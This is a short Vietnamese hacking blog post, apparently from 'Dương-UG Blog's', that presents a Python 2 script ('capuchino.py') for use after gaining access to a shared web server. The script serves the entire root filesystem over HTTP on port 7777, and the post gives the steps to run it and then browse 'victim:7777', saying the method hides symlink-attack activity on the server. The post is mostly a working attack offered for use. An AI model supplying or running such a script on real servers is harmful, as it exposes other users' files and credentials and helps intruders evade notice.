Sym root bypass open port nếu server cho chạy python


Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.

Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py

#!/usr/bin/env python
# Bypass for (c) 2013
import SimpleHTTPServer
import SocketServer
import os
port = 7777
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://maho.com:" + str(port))
httpd.serve_forever()

Sau đó chạy nó python capuchino.py

rồi kiểm tra kết quả :victim:7777

Cách này có thể giấu đc kết quả thực hiện sym trên server

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

0 nhận xét:

Đăng nhận xét

:) :( :)) :(( =))

Copyright © Dương-UG Blog's - Nguyễn Bình Dương